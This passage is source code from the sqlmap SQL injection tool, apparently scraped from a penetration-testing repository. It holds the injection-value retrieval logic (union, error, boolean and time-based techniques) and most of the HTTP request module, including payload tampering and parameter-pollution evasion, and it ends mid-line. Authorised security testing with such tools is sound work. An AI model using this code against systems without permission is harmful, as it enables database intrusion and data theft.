expression.upper(): expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None def _goBooleanProxy(expression): """ Retrieve the output of a boolean based SQL query """ initTechnique(kb.technique) if conf.dnsName: query = agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) output = _goDns(payload, expression) if output is not None: return output vector = kb.injection.data[kb.technique].vector vector = vector.replace("[INFERENCE]", expression) query = agent.prefixQuery(vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) output = hashDBRetrieve(expression, checkConf=True) if output is None: output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False) if output is not None: hashDBWrite(expression, output) return output def _goUnion(expression, unpack=True, dump=False): """ Retrieve the output of a SQL query taking advantage of an union SQL injection vulnerability on the affected parameter. """ output = unionUse(expression, unpack=unpack, dump=dump) if isinstance(output, basestring): output = parseUnionPage(output) return output def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection affected parameter. """ if conf.hexConvert: charsetType = CHARSET_TYPE.HEXADECIMAL kb.safeCharEncode = safeCharEncode kb.resumeValues = resumeValue if suppressOutput is not None: pushValue(getCurrentThreadData().disableStdOut) getCurrentThreadData().disableStdOut = suppressOutput try: pushValue(conf.db) pushValue(conf.tbl) if expected == EXPECTED.BOOL: forgeCaseExpression = booleanExpression = expression if expression.upper().startswith("SELECT "): booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") else: forgeCaseExpression = agent.forgeCaseStatement(expression) if conf.direct: value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): query = cleanQuery(expression) query = expandAsteriskForColumns(query) value = None found = False count = 0 if query and not re.search(r"COUNT.*FROM.*\(.*DISTINCT", query, re.I): query = query.replace("DISTINCT ", "") if not conf.forceDns: if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): kb.technique = PAYLOAD.TECHNIQUE.UNION kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion try: value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) except SqlmapConnectionException: if not fallback: raise count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if not found and fallback: warnMsg = "something went wrong with full UNION " warnMsg += "technique (could be because of " warnMsg += "limitation on retrieved number of entries)" if " FROM " in query.upper(): warnMsg += ". Falling back to partial UNION technique" singleTimeWarnMessage(warnMsg) pushValue(kb.forcePartialUnion) kb.forcePartialUnion = True value = _goUnion(query, unpack, dump) found = (value is not None) or (value is None and expectingNone) kb.forcePartialUnion = popValue() else: singleTimeWarnMessage(warnMsg) if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if found and conf.dnsName: _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) warnMsg = "option '--dns-domain' will be ignored " warnMsg += "as faster techniques are usable " warnMsg += "(%s) " % _ singleTimeWarnMessage(warnMsg) if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): kb.technique = PAYLOAD.TECHNIQUE.TIME else: kb.technique = PAYLOAD.TECHNIQUE.STACKED if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) else: errMsg = "none of the injection types identified can be " errMsg += "leveraged to retrieve queries output" raise SqlmapNotVulnerableException(errMsg) finally: kb.resumeValues = True conf.tbl = popValue() conf.db = popValue() if suppressOutput is not None: getCurrentThreadData().disableStdOut = popValue() kb.safeCharEncode = False if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert: warnMsg = "in case of continuous data retrieval problems you are advised to try " warnMsg += "a switch '--no-cast' " warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else "" singleTimeWarnMessage(warnMsg) return extractExpectedValue(value, expected) def goStacked(expression, silent=False): if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: kb.technique = PAYLOAD.TECHNIQUE.STACKED else: for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): _ = getTechniqueData(technique) if _ and "stacked" in _["title"].lower(): kb.technique = technique break expression = cleanQuery(expression) if conf.direct: return direct(expression) query = agent.prefixQuery(";%s" % expression) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True) def checkBooleanExpression(expression, expectingNone=True): return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
20,405
Python
.py
371
42.3531
271
0.633991
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,950
connect.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/connect.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import json import logging import re import socket import string import time import traceback import urllib2 import urlparse from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import asciifyUrl from lib.core.common import calculateDeltaSeconds from lib.core.common import clearConsoleLine from lib.core.common import cpuThrottle from lib.core.common import dataToStdout from lib.core.common import evaluateCode from lib.core.common import extractRegexResult from lib.core.common import findMultipartPostBoundary from lib.core.common import getCurrentThreadData from lib.core.common import getHostHeader from lib.core.common import getRequestHeader from lib.core.common import getUnicode from lib.core.common import logHTTPTraffic from lib.core.common import pushValue from lib.core.common import popValue from lib.core.common import randomizeParameterValue from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import removeReflectiveValues from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import stdev from lib.core.common import wasLastResponseDelayed from lib.core.common import unicodeencode from lib.core.common import urldecode from lib.core.common import urlencode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.dicts import POST_HINT_CONTENT_TYPES from lib.core.enums import ADJUST_TIME_DELAY from lib.core.enums import AUTH_TYPE from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NULLCONNECTION from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.enums import REDIRECTION from lib.core.enums import WEB_API from lib.core.exception import SqlmapCompressionException from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapTokenException from lib.core.exception import SqlmapValueException from lib.core.settings import ASTERISK_MARKER from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE from lib.core.settings import MAX_CONNECTIONS_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import MIN_TIME_RESPONSES from lib.core.settings import IS_WIN from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PERMISSION_DENIED_REGEX from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE from lib.core.settings import REPLACEMENT_MARKER from lib.core.settings import TEXT_CONTENT_TYPE_REGEX from lib.core.settings import UNENCODED_ORIGINAL_VALUE from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import WARN_TIME_STDEV from lib.request.basic import decodePage from lib.request.basic import forgeHeaders from lib.request.basic import processResponse from lib.request.direct import direct from lib.request.comparison import comparison from lib.request.methodrequest import MethodRequest from thirdparty.multipart import multipartpost from thirdparty.odict.odict import OrderedDict from thirdparty.socks.socks import ProxyError class Connect(object): """ This class defines methods used to perform HTTP requests """ @staticmethod def _getPageProxy(**kwargs): return Connect.getPage(**kwargs) @staticmethod def _retryProxy(**kwargs): threadData = getCurrentThreadData() threadData.retriesCount += 1 if conf.proxyList and threadData.retriesCount >= conf.retries: warnMsg = "changing proxy" logger.warn(warnMsg) conf.proxy = None setHTTPProxy() if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query warnMsg = "most probably web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " warnMsg += "persists please wait for few minutes and rerun " warnMsg += "without flag T in option '--technique' " warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " warnMsg += "Tor installed and running so " warnMsg += "you could successfully use " warnMsg += "switch '--tor' " if IS_WIN: warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')" else: warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" else: warnMsg = "if the problem persists please check that the provided " warnMsg += "target URL is valid. In case that it is, you can try to rerun " warnMsg += "with the switch '--random-agent' turned on " warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) time.sleep(1) kwargs['retrying'] = True return Connect._getPageProxy(**kwargs) @staticmethod def _connReadProxy(conn): retVal = "" if not kb.dnsMode and conn: headers = conn.info() if headers and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: warnMsg = "large compressed response detected. Disabling compression" singleTimeWarnMessage(warnMsg) kb.pageCompress = False else: while True: _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) if len(_) == MAX_CONNECTION_CHUNK_SIZE: warnMsg = "large response detected. This could take a while" singleTimeWarnMessage(warnMsg) _ = re.sub(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start), "%s%s%s" % (kb.chars.stop, LARGE_CHUNK_TRIM_MARKER, kb.chars.start), _) retVal += _ else: retVal += _ break if len(retVal) > MAX_CONNECTION_TOTAL_SIZE: warnMsg = "too large response detected. Automatically trimming it" singleTimeWarnMessage(warnMsg) break return retVal @staticmethod def getPage(**kwargs): """ This method connects to the target URL or proxy and returns the target URL page content """ if isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) if conf.dummy: return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt()) threadData = getCurrentThreadData() with kb.locks.request: kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter url = kwargs.get("url", None) or conf.url get = kwargs.get("get", None) post = kwargs.get("post", None) method = kwargs.get("method", None) cookie = kwargs.get("cookie", None) ua = kwargs.get("ua", None) or conf.agent referer = kwargs.get("referer", None) or conf.referer host = kwargs.get("host", None) or conf.host direct_ = kwargs.get("direct", False) multipart = kwargs.get("multipart", False) silent = kwargs.get("silent", False) raise404 = kwargs.get("raise404", True) timeout = kwargs.get("timeout", None) or conf.timeout auxHeaders = kwargs.get("auxHeaders", None) response = kwargs.get("response", False) ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout refreshing = kwargs.get("refreshing", False) retrying = kwargs.get("retrying", False) crawling = kwargs.get("crawling", False) skipRead = kwargs.get("skipRead", False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") conn = None code = None page = None _ = urlparse.urlsplit(url) requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) # fix for known issues when using url in unicode format # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) url = unicodeencode(url) try: socket.setdefaulttimeout(timeout) if direct_: if '?' in url: url, params = url.split('?', 1) params = urlencode(params) url = "%s?%s" % (url, params) elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect._connReadProxy(conn) if not skipRead else None responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) return page elif any((refreshing, crawling)): pass elif target: if conf.forceSSL and urlparse.urlparse(url).scheme != "https": url = re.sub("\Ahttp:", "https:", url, re.I) url = re.sub(":80/", ":443/", url, re.I) if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] if not conf.skipUrlEncode: get = urlencode(get, limit=True) if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST): post = conf.parameters[PLACE.POST] elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer}) if kb.authHeader: headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" headers[HTTP_HEADER.HOST] = host or getHostHeader(url) if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers: headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE warnMsg += "Will try to reconstruct" singleTimeWarnMessage(warnMsg) boundary = findMultipartPostBoundary(conf.data) if boundary: headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) if auxHeaders: for key, item in auxHeaders.items(): for _ in headers.keys(): if _.upper() == key.upper(): del headers[_] headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) post = unicodeencode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if post is not None: if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH): requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTP_HEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post is not None: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 'redurl'): page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect._connReadProxy(conn) if not skipRead else None code = code or conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? [Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect._getPageProxy(**kwargs) except SqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occurred during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() if not skipRead else None responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED and not conf.ignore401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise SqlmapConnectionException(errMsg) else: debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise SqlmapConnectionException(warnMsg) else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e: tbMsg = traceback.format_exc() if "no host given" in tbMsg: warnMsg = "invalid URL address used (%s)" % repr(url) raise SqlmapSyntaxException(warnMsg) elif "forcibly closed" in tbMsg: warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests") warnMsg = "connection timed out to the target URL" elif "URLError" in tbMsg or "error" in tbMsg: warnMsg = "unable to connect to the target URL" elif "BadStatusLine" in tbMsg: warnMsg = "connection dropped or unknown HTTP " warnMsg += "status code received" if not conf.agent and not conf.randomAgent: warnMsg += ". Try to force the HTTP User-Agent " warnMsg += "header with option '--user-agent' or switch '--random-agent'" elif "IncompleteRead" in tbMsg: warnMsg = "there was an incomplete read error while retrieving data " warnMsg += "from the target URL" else: warnMsg = "unable to connect to the target URL" if "BadStatusLine" not in tbMsg: warnMsg += " or proxy" if silent: return None, None, None elif "forcibly closed" in tbMsg: logger.critical(warnMsg) return None, None, None elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")): return None, None, None elif threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise SqlmapConnectionException(warnMsg) finally: if not isinstance(page, unicode): if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): page = unicode(page, errors="ignore") else: page = getUnicode(page) socket.setdefaulttimeout(conf.timeout) processResponse(page, responseHeaders) if conn and getattr(conn, "redurl", None): _ = urlparse.urlsplit(conn.redurl) _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) requestMsg = re.sub("(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_), requestMsg, 1) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status) else: responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) if not skipLogTraffic: logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) return page, responseHeaders, code @staticmethod def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET if not auxHeaders: auxHeaders = {} raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = OrderedDict(conf.httpHeaders) contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: try: payload = function(payload=payload, headers=auxHeaders) except Exception, ex: errMsg = "error occurred while running tamper " errMsg += "function '%s' ('%s')" % (function.func_name, ex) raise SqlmapGenericException(errMsg) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', "&gt;").replace('<', "&lt;") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be throughly URL encoded if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(' '), ' '): if splitter in payload: prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*")) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) payload = "".join(parts) for splitter in (urlencode(','), ','): payload = payload.replace(splitter, "%s%s=" % 